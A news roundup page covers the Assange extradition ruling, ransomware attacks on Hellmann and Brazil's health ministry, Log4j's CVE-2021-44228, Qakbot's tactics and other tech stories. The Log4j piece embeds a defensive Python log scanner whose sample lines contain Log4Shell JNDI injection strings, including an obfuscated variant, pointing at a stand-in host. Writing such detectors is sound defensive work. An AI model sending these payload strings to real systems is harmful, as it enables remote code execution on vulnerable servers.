More stories

  • UK High Court reverses course, approves Julian Assange's extradition to US

    A UK High Court has approved the extradition of WikiLeaks founder Julian Assange to the US. 


    Assange has been wanted by US authorities since the early 2010s for his role in acquiring and disseminating military and diplomatic documents via the WikiLeaks website. Following a long stint at Ecuador’s embassy in London, he was finally arrested in 2019, when his asylum was revoked. He has been indicted on 18 criminal counts, including 17 espionage charges. The collective maximum sentence for all charges comes to 175 years, but the US government has indicated that the actual imprisonment would be far, far shorter.

    This decision follows an earlier ruling made in January 2021, which denied the US request based on the court’s perception that it posed too great a risk to Assange’s wellbeing. The judge forbade the extradition due to “a recurrent depressive disorder which was severe in December 2019 and sometimes accompanied by psychotic features (hallucinations), often with ruminative suicidal ideas.” The new ruling takes concerns over Assange’s mental health into account, but it also integrates a series of four “assurances” made by US officials. These include: a promise that Assange will never be held under any “special administrative measures”; a commitment to never house him within a maximum security prison; a guarantee that he will be allowed to serve his final sentence in his native Australia, if he wishes; and a commitment to provide him with “appropriate clinical and psychological treatment as recommended by a qualified treating clinician at the prison where he is held.”

    Assange’s fiancée, Stella Morris, was outraged by the decision, telling the UK’s Sky News that his legal counsel intended to appeal the decision “at the earliest possible moment.” She called the repeal a “grave miscarriage of justice,” asking how the UK could allow him to be sent to a country that “plotted to kill him.” This final accusation likely relates to reporting from earlier this year, which claims that the Trump administration explored the possibility of forcibly kidnapping or assassinating Assange in 2017. The US government has never officially commented on this report. Assange remains a controversial figure, with organizations like Amnesty International and individuals like Edward Snowden still calling for his release based on concerns over preserving freedom of speech and the arrest’s chilling effect on investigative journalism. The US government, however, has never wavered in its stance that the WikiLeaks founder’s actions were criminal in nature, putting lives at risk by divulging classified information to enemies of the US.

    Assange’s legal team now has 14 days to file their appeal, which will delay any extradition proceedings until that filing is subsequently resolved. 


  • German logistics giant Hellmann reports cyberattack

    Billion-dollar logistics firm Hellmann Worldwide Logistics reported a cyberattack this week that forced it to temporarily remove all connections to its central data center. The company said the shutdown was having a “material impact” on its business operations.


    The German company operates in 173 countries, running logistics for a range of air and sea freight as well as rail and road transportation services. Air Cargo News, which first reported the attack, said the company had a revenue of nearly $3 billion last year. In a statement, Hellmann said its Global Crisis Taskforce discovered the attack, and that outside cybersecurity experts were brought in to help with the response. “Operations will be restored step by step, with the security and integrity of the systems as the top priority,” reads the statement. The statement does not say whether the company was suffering from a ransomware attack, and the company did not respond to requests for comment.

    This is a particularly inopportune time for a global logistics firm like Hellmann to suffer a cyberattack, considering the role it plays in the global supply chain, explained Nasser Fattah, North America steering committee chair at Shared Assessments. “Today, the movement of goods is a global process that requires a concerted effort because the supply chain may include transportation, shipping, receiving, storage, and management of goods,” Fattah said.

    “The slightest kink in the chain can cause the business to suffer simply because of untimely deliveries. And businesses know that implementing seamless logistics is essential to keep pace with customer demands and remain competitive.”

  • Brazilian Ministry of Health suffers cyberattack and COVID-19 vaccination data vanishes

    Websites under Brazil’s Ministry of Health (MoH) have suffered a major ransomware attack that resulted in the unavailability of COVID-19 vaccination data of millions of citizens. Following the attack, which took place at around 1 am today, all of MoH’s websites, including ConecteSUS, which tracks the trajectory of citizens in the public healthcare system, became unavailable. This includes the COVID-19 digital vaccination certificate, which is available via the ConecteSUS app.

    According to a message left by the Lapsus$ Group, which has claimed responsibility for the attack, some 50 TB worth of data has been extracted from the MoH’s systems and subsequently deleted. “Contact us if you want the data returned”, the message said, alongside contact details for the authors of the attack. Just before 7 am, the images with the message left by the hackers were removed, but the websites remained unavailable. Contacted by ZDNet about the measures in place to mitigate the attack and reestablish the systems, and whether there are backups for the data allegedly stolen from its systems, the Ministry of Health had not returned requests for comment at the time of writing.

    The incident follows a previous attack on the Brazilian Health Regulatory Agency (Anvisa) in September. That attack was focused on the healthcare declaration for travelers, compulsory for individuals entering Brazil via airports. It took place soon after the cancellation of the World Cup qualifier match between Brazil and Argentina, in which Anvisa interrupted the game after four Argentinian players were accused of breaking COVID-19 travel protocols.

    Similarly, the latest issue faced by the Ministry of Health occurs amid increasing pressure on the Brazilian government to demand COVID-19 vaccination certificates from international travelers coming to Brazil, as a response to the rise of the omicron variant. This is not the first major security issue faced by Brazil’s Ministry of Health over the last few months. In November 2020, personal and health information of more than 16 million Brazilian COVID-19 patients was leaked online after a hospital employee uploaded a spreadsheet with usernames, passwords, and access keys to sensitive government systems on GitHub. Less than a week later, another major security incident emerged. The personal information of more than 243 million Brazilians, both living and deceased, was exposed online after web developers left the password for a crucial government database inside the source code of an official MoH website for at least six months.


  • Sidewalk delivery is heading for a turf war

    An autonomous sidewalk delivery company is announcing the closing of a seed funding round with some big backers. Serve Robotics joins a rapidly expanding list of autonomous delivery developers wooing investors with the notion of robots conducting last mile deliveries in urban and suburban areas. The autonomous delivery ecosystem has been fun to watch, and the name of the game is strategic commercial alliances. We could be heading for a turf war as big food service providers and existing delivery providers all try to get an early edge in last mile autonomous delivery.

    Participation from strategic investors in this round is telling. Backers include Uber Technologies, Delivery Hero-backed DX Ventures, and Wavemaker Partners’ food-automation-focused venture studio Wavemaker Labs. Also participating is 7-Eleven Inc.’s corporate venture arm, 7-Ventures, LLC. The convenience store innovator is leaning hard into autonomous delivery. “Our vision at 7-Eleven is to be the first choice for convenience – anytime, anywhere. We are redefining convenience by delivering innovative shopping solutions to our customers,” says Raghu Mahadevan, 7-Eleven SVP and Chief Digital Officer. “This collaboration will allow us to continue our 94-year legacy of innovation and expand our last mile delivery capabilities to make 7NOW more affordable, sustainable and accessible for everyone.”

    The autonomous delivery space is growing rapidly as the focus has begun shifting from technology development and proof of concept to scaling and dealmaking. Many of these technology companies are operating on an as-a-service model, and securing partners with existing customer bases and brand recognition is the quickest way to scale. Serve Robotics designs, develops and operates zero-emissions rovers that serve people in public spaces, starting with food delivery. Founded in 2017 as the robotics division of Postmates, Serve spun off as an independent company in early 2021.

    The new round extends Serve’s previous seed funding raise and predictably will be used to accelerate the company’s path to commercial scale, driving its fleet expansion, geographic growth, and continued product development. Most recently, Serve announced its first partnership with UberEats. “Serve Robotics is pleased to have the backing of strong strategic partners able to support our intention to provide sustainable, self-driving delivery at scale,” says Dr. Ali Kashani, Co-founder and CEO of Serve Robotics. “This initial round of financial and strategic support will allow us to continue advancing our technology, growing our team, and expanding our partnership platform.”

    All of this tracks closely with the strategic alliances being formed across the sector. Other autonomous delivery companies maneuvering for market share include Starship Technologies, which is expanding its reach across college campuses, Nuro, which also recently partnered with 7-Eleven, and Refraction AI, which closed a round of funding this year, to name just a few players.

  • Security warning: New zero-day in the Log4j Java library is already being exploited

    A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers. Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution with the privileges of the user running the application that uses the Java logging library. CERT New Zealand warns that it’s already being exploited in the wild. CISA has urged users and administrators to apply the recommended mitigations “immediately” in order to address the critical vulnerability.


    Systems and services that use the Java logging library Apache Log4j, versions 2.0 through 2.14.1, are all affected, including many services and applications written in Java. The vulnerability was first discovered in Minecraft, but researchers warn that cloud applications are also vulnerable. The library is also used in enterprise applications, and it’s likely that many products will be found to be vulnerable as more is learned about the flaw. A blog post by researchers at LunaSec warns that anybody using Apache Struts is “likely vulnerable.”

    LunaSec said: “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it ‘Log4Shell’ for short.” Organisations can identify whether they’re affected by examining the log files of any services using affected Log4j versions. If the logs contain user-controlled strings (CERT-NZ uses the example of “Jndi:ldap”), those services could be affected. To mitigate the vulnerability, users should switch log4j2.formatMsgNoLookups to true by adding “-Dlog4j2.formatMsgNoLookups=True” to the JVM command used to start the application. To prevent the library from being exploited, it’s urgently recommended that Log4j versions are upgraded to log4j-2.15.0-rc1. “If you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,” cybersecurity researchers at Randori wrote in a blog post. “If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly.”
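    As an added illustration of the two defensive steps described above, the log review CERT-NZ suggests and the formatMsgNoLookups JVM flag, the following Python script is example code written for this page; it is not from ZDNet, CERT-NZ, Randori, LunaSec or the Log4j project. The sample log lines, the hostnames in them and the function names are constructed for the example. It scans access-log lines for Log4j “${jndi:” lookup strings, resolving the library’s own lower/upper case-changing lookups first so that a split-up “jndi” is still found, and checks a JVM argument list for the mitigation flag.

```python
import re
from typing import List, Tuple

# Constructed sample web-server log lines (not from any real system). The
# user-agent field is the attacker-controlled string that Log4j would log.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:09:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:09:12:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:09:12:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://example.invalid/b}"',
    '10.0.0.7 - - [10/Dec/2021:09:13:00 +0000] "POST /api/login HTTP/1.1" 401 0 "-" "curl/7.79.1"',
]

# Log4j 2 lookups can be nested, e.g. ${lower:J} evaluates to "j", so a scanner
# that only looks for the literal text "${jndi:" would miss the third sample line.
# Only the lower/upper lookups are resolved here; this is a detection heuristic,
# not a full Log4j lookup parser (assumption: sufficient for log triage).
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
_JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _apply_case_lookup(match: "re.Match[str]") -> str:
    """Evaluate a single ${lower:x} or ${upper:x} lookup to its plain text."""
    kind, text = match.group(1), match.group(2)
    return text.lower() if kind == "lower" else text.upper()


def normalize_lookups(text: str) -> str:
    """Repeatedly resolve nested lower/upper lookups until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(_apply_case_lookup, text)
    return text


def find_jndi_lookups(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, jndi_scheme, original_line) for every line that
    contains a JNDI lookup after normalisation. Line numbers start at 1."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI_LOOKUP.search(normalize_lookups(line))
        if match:
            hits.append((number, match.group(1).lower(), line))
    return hits


def jvm_mitigation_present(jvm_args: List[str]) -> bool:
    """True if the argument list sets -Dlog4j2.formatMsgNoLookups to true.
    The value is compared case-insensitively, matching how Java parses booleans,
    so the "=True" form quoted in the article is accepted as well."""
    for arg in jvm_args:
        key, sep, value = arg.partition("=")
        if key == "-Dlog4j2.formatMsgNoLookups" and sep and value.strip().lower() == "true":
            return True
    return False


if __name__ == "__main__":
    for number, scheme, line in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup via {scheme} -> {line}")
    print("mitigation flag set:", jvm_mitigation_present(["-Xmx1g", "-Dlog4j2.formatMsgNoLookups=True"]))
```

    Run it against a real access log by feeding the file's lines to find_jndi_lookups; any hit is a reason to follow Randori's advice above and treat the host as potentially compromised rather than merely probed, because the log line only shows that the string arrived, not whether the lookup succeeded. The flag check is a configuration audit only; upgrading the library, as the article recommends, is still required.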

  • This old malware has just picked up some nasty new tricks

    Qakbot, a top trojan for stealing bank credentials, has in the past year started delivering ransomware, and this new business model is making it harder for network defenders to detect what is and isn’t a Qakbot attack. Qakbot is an especially versatile piece of malware: it has been around for over a decade and has survived despite multi-year efforts by Microsoft and other security firms to stamp it out. In 2017 Qakbot adopted WannaCry’s lateral movement techniques, such as infecting all network shares and drives, brute forcing Active Directory accounts and using the SMB file-sharing protocol to create copies of itself.


    Kaspersky’s recent analysis of Qakbot concluded that it won’t disappear anytime soon. Its detection statistics for Qakbot indicated it had infected 65% more PCs between January and July 2021 compared to the same period in the previous year. So, it is a growing threat. Microsoft highlights that Qakbot is modular, allowing it to appear as separate attacks on each device on a network, making it difficult for defenders and security tools to detect, prevent and remove. It’s also difficult for defenders to detect because Qakbot is used to distribute multiple variants of ransomware. “Due to Qakbot’s high likelihood of transitioning to human-operated attack behaviors including data exfiltration, lateral movement, and ransomware by multiple actors, the detections seen after infection can vary widely,” the Microsoft 365 Defender Threat Intelligence Team says in its report. Given these difficulties pinpointing a common Qakbot campaign, the Microsoft team has profiled the malware’s techniques and behaviors to help security analysts root out this versatile malware.

    The primary delivery mechanism is emailed attachments, links, or embedded images. However, it’s also known to use Visual Basic for Applications (VBA) macros as well as legacy Excel 4.0 macros to infect machines. Trend Micro analyzed a large Qakbot campaign in July that used this technique. Other groups like Trickbot recently started using Excel 4.0 macros to call Win32 APIs and run shell commands. As a result, Microsoft disabled these macro types by default, but Qakbot uses text in an Excel document to trick targets into manually enabling the macro.

    Qakbot employs process injection to hide malicious processes, creates scheduled tasks to persist on a machine, and manipulates the Windows registry. Once running on an infected device, it uses multiple techniques for lateral movement, employs the Cobalt Strike penetration-testing framework, or deploys ransomware. The FBI last year warned that Qakbot trojans were delivering ProLock, a “human-operated ransomware” variant. It was a worrying development: computers on a network infected with Qakbot must be isolated, because they’re a bridge for a ransomware attack. Microsoft notes MSRA.exe and Mobsync.exe have been used by Qakbot for this process injection in order to run several network ‘discovery’ commands and then steal Windows credentials and browser data.

    Qakbot’s Cobalt Strike module lends itself to other criminal gangs who can drop their own payloads, such as ransomware. Per Trend Micro, Qakbot has delivered MegaCortex and PwndLocker (2019), Egregor and ProLock (2020), and Sodinokibi/REvil (2021). “Qakbot has a Cobalt Strike module, and actors who purchase access to machines with prior Qakbot infections may also drop their own Cobalt Strike beacons and additional payloads,” Microsoft notes. “Using Cobalt Strike lets attackers have full hands-on-keyboard access to the affected devices, enabling them to perform additional discovery, find high-value targets on the network, move laterally, and drop additional payloads, especially human-operated ransomware variants such as Conti and Egregor.”

    Microsoft’s recommended mitigations to minimize Qakbot’s impact include enabling Office 365 phishing protection, enabling SmartScreen and network protection in the Edge browser, and ensuring runtime macro scanning by turning the Windows Antimalware Scan Interface (AMSI) on. AMSI is supported by Microsoft Defender antivirus and several third-party antivirus vendors. AMSI support for Excel 4.0 macros arrived in March, so it’s still a relatively new feature.

  • Singapore-UK digital economy pact to focus on cybersecurity, trade

    Singapore and the UK have wrapped up negotiations on a digital economy agreement that focuses on digital trade, data flows, and cybersecurity. Under the pact, both nations will look to establish, amongst others, interoperable systems for digital payments, secured data flows, and digital identities, as well as collaborate on cybersecurity. When formally inked, the digital economy agreement would be Singapore’s third, following the one it signed with Chile and New Zealand and the one with Australia. The UK agreement includes “binding disciplines” of the digital economy such as data, and cooperation in emerging areas including artificial intelligence, fintech, digital identities, and legal technology.

    Common digital systems, for instance, would be put in place to facilitate e-payments, e-invoicing, and other electronic documents such as bills of lading. The goal here was to drive faster and cheaper transactions, reducing costs for businesses in both markets. The two countries also would look to enable trusted data flows and data protection for various functions, including financial services. In addition, a “trusted and secure digital environment” would be critical to drive and safeguard participation for both businesses and consumers. For example, private cryptography keys and embedded algorithms would help secure an organisation’s source code, while consumers should be protected against fraudulent and deceptive online behaviour. For a start, government agencies from both sides last week signed three Memoranda of Understanding (MOUs) in digital trade, digital identities, and cybersecurity. Collectively, these aimed to facilitate cross-border services between Singapore and the UK, where bilateral trade in services was tipped at SG$22 billion ($16.02 billion) in 2019.

    Some 70% of the UK’s cross-border services exports to Singapore in 2019 also were digitally processed, totalling £3.2 billion ($4.23 billion). The UK is Singapore’s largest services trading partner in Europe and the Asian economy’s second-largest European investor and European investment destination, with more than SG$100 billion ($72.81 billion) of UK investment stock in Singapore. Under the digital trade MOU, a scheme would be piloted to simulate the transfer of electronic bills of lading, with the aim to ease cross-border trade transactions. Digitalising this process helped cut cost and transaction time as well as reduce fraud. The MOU on digital identities looked to develop mutual recognition and interoperability between both countries’ digital identity regimes. The goal here was to establish more reliable identity verification and more quickly process applications. In cybersecurity, the two nations hoped to build on a shared goal of “addressing international challenges” and promoting bilateral collaboration to bolster cybersecurity, including in Internet of Things (IoT), capacity building, and cyber resilience.

    Singapore’s Minister-in-charge of Trade Relations S. Iswaran said: “Singapore’s digital economy agreements build on and enhance the economic connectivity established through our extensive network of free trade agreements. Reflecting our shared ambition, the UK-Singapore Digital Economy Agreement builds upon and, in some areas, goes further than our existing agreements. It will set a global benchmark for high-standard digital trade rules and benefit people and businesses in our two countries.” Negotiations for the Singapore-UK digital trade agreement kicked off in June 2021.

  • NBN replaced over 21,000 FttC connection devices in six weeks to mid-November

    Image: What an NCD fears most (Clinton Naik)
    When summer weather begins to hit the Australian east coast, those on fibre-to-the-curb (FttC) connections need to brace for some electronics frying thanks to lightning activity. In an update to the numbers it revealed to Senate Estimates in May, where it had replaced almost 48,000 FttC connection devices across November 2020 to March 2021, NBN said it has now replaced 99,226 NBN Co Connection Devices (NCD) from 1 December 2020 to 11 November 2021. “Between 1 October 2021 and 11 November 2021 NBN Co has replaced a total of 21,424 devices. This includes replacements as a result of multiple severe weather events across the eastern states of Australia during October,” it said. “FttC NCDs … can be replaced for a wide variety of reasons, including customers removing the device when they move house, new devices being automatically provided when a customer changes providers, and accidental damage in premises.” The company also said it had sought scientific advice on the lightning issue, and the NSW Blue Mountains had a higher than normal NCD failure rate. “The Blue Mountains area has high levels of electrical storm activity and a geological make-up that can affect earthing mechanisms,” it said. By contrast, the number of full fibre network termination devices that need replacing was 5616 from the start of the year to November 11.

    In the July storms that hit Victoria and forced outages on the network, NBN said there were just over 200,000 services impacted, with 39.2% on cable, a further 39.2% on fibre to the node or fibre to the basement, 13.8% on fixed wireless, 6.2% on full fibre, and 1.7% on fibre to the curb. Elsewhere in its answers, NBN said it had 640,880 brownfields premises in its fibre-to-the-basement (FttB) footprint, and while full fibre was the default for new apartment blocks of more than 20 premises, FttB is sometimes deployed at a customer’s request and the total figure for FttB on new builds sits under the 2% mark. The company also said it had 83,356 Sky Muster customers, and 29.482 Sky Muster Plus customers at the end of September, with Plus customers averaging 159GB each in September, which includes uplink and downlink data.

    For the year to October 31, NBN said 9.3% of all scheduled appointments were missed. “In many of these cases, the technician turned up earlier or later than the stipulated time and still completed the job on the day. The number also includes some cases where bad weather restricted the ability to complete the job,” it said. “The number of missed appointments has decreased steadily month on month since May 21 despite adverse weather conditions in September/October, which can restrict the ability to reach site on time and complete the job.” In June, NBN called for expressions of interest from government agencies to take part in its AU$300 million regional co-investment fund. By October 21, it had AU$29 million of proposals in progress, with 250 requests from local councils and state governments for cost estimates, and 21 projects won.